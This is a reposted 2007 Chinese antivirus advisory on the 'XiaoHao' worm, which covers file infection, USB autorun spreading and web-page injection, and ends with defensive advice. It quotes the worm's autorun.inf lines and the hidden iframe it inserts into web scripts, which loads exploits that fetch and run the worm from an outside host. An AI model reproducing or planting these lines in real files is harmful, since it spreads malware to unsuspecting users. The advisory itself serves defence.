| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | 

您现在的位置: 中国X黑客小组 >> 技术文章 >> 新闻中心 >> 病毒公告 >> 文章正文 用户登录 新用户注册
  破坏力超熊猫烧香 小浩蠕虫技术报告          【字体:
破坏力超熊猫烧香 小浩蠕虫技术报告
作者:佚名    文章来源:网络    点击数:    更新时间:2007-8-16    

8月14日,江民科技反病毒中心监测到,一种名为“小浩”蠕虫病毒出现在网络上,该病毒和“熊猫烧香”蠕虫病毒类似,可以感染 *.exe可执行程序,可以通过U盘传播, 
还会感染各种网页脚本程序,插入带毒网址,但是与“熊猫烧香”蠕虫病毒不同的是,被感染后的*.exe文件将遭到破坏,无法恢复!

江民反病毒专家分析该病毒详细技术特征如下:

病毒名称:Worm/XiaoHao.a

中 文 名:小浩蠕虫

病毒类型:蠕虫

危害等级:★★★★

影响平台:Win 9X/ME/NT/2000/XP/2003

病毒运行特征:

Worm/XiaoHao.a 蠕虫采用Visual C++6.0 工具编写,并经过UPX工具加壳处理,病毒运行后,会在每个硬盘跟目录下释放病毒文件:

c:\xiaohao.exe, 402706字节

c:\autorun.inf, 91字节

其中xiaohao.exe 文件为病毒主体,该文件运行后搜索全盘扩展名为*.exe 的文件,将自身病毒体写入到正常文件中,从而使原文件成为新的病毒体,被感染后的文件图标为一个表示有“浩”字的图标,当浏览含有被感染病毒文件的窗口时,窗口的标题栏会有已中毒 X14o-H4o's Virus 的字样。
 

如下图:

由于该病毒采用的是覆盖式写入,因此被感染后的文件无法恢复。并且该病毒进程还会创建iexplore.exe 子进程,利用多个系统漏洞下载木马病毒。

另外,在各个硬盘跟目录下释放的autorun.inf 文件是病毒主体的伴生文件,该文件内容如下:

[Autorun]

open=Xiaohao.exe

shellexecute=Xiaohao.exe

shell\Auto\command=Xiaohao.exe

这样,该病毒就可以利用Windows系统的自动播放功能借助与U盘来传播,当用户在不知情的情况下,双击已感染该病毒的U盘时,就会将病毒传播到新的系统中。

该病毒还会搜索全盘中扩展名为*.htm、*.html、*.asp、*.aspx、*.php、*.jsp 的网页脚本文件,向其中插入恶意网址连接<iframe src=http://xiaohao.yona.biz/***.htm width=0 height=0></iframe>,该病毒网址会利用MS06-014、MS06-046、MS07-017 等多个系统漏洞下载并且执行病毒文件http://xiaohao.yona.biz/***.exe ,该文件为病毒体自身。

该病毒会将系统时间修改为2005年1月17日,使一些杀毒软件的使用授权失效,病毒还会模拟鼠标操作,企图绕过杀毒软件的主动防御功能。

该病毒会将其他未被感染的文件设置成隐藏属性,还会生成文件:c:\Jilu.txt,用以记录被感染的文件和被隐藏的文件。该病毒还会破坏注册表相关键值,使其不能显示隐藏文件,严重影响了电脑的正常使用。

据息,该病毒作者还将病毒源代码公开在互联网中,并且还留下了自己的QQ号和博客地址,称“欢迎各位大牛. 来指导我  或者是交流” ,具有明显的技术炫耀性。

针对此病毒,江民科技已经紧急升级了病毒库,只要升级到8月14日的病毒库,即可拦截此病毒的入侵。

江民反病毒专家建议广大用户:

1. 安装KV2007的杀毒软件,开启每天定时升级病毒库,定时杀毒功能,并开启所有的监控功能。

2. 禁用系统的自动播放功能,防止病毒从U盘、移动硬盘、MP3等移动存储设备进入到计算机。

禁用Windows 系统的自动播放功能的方法:在运行中输入 gpedit.msc 后回车,打开组策略编辑器,依次点击:计算机配置->管理模板->系统->关闭自动播放->已启用->所有驱动器->确定。

3. 利用Windows Update 功能打全系统补丁,避免病毒从网页木马的方式入侵到系统中。

文章录入:IceRiver    责任编辑:admin 
  • 上一篇文章:

  • 下一篇文章:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    最新热点 最新推荐 相关文章
    全国首判破坏计算机信息系统
    CMD破坏王病毒活跃 电脑亚健
    又见CMD破坏王变种 又现恶意
    上海首例“破坏计算机信息系
    最新病毒播报:主页破坏者专
    警惕“帕虫”扰乱系统 破坏安
    破坏多种常用软件的帕虫病毒
    恐怖分子可能网上攻击 破坏英
    ARP欺骗木马程序入侵电脑系统
    一种进行ARP欺骗的木马入侵计
      网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
    Powered by ICE RIVER - STUDIO
    » CnXHacker.CoM   © CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.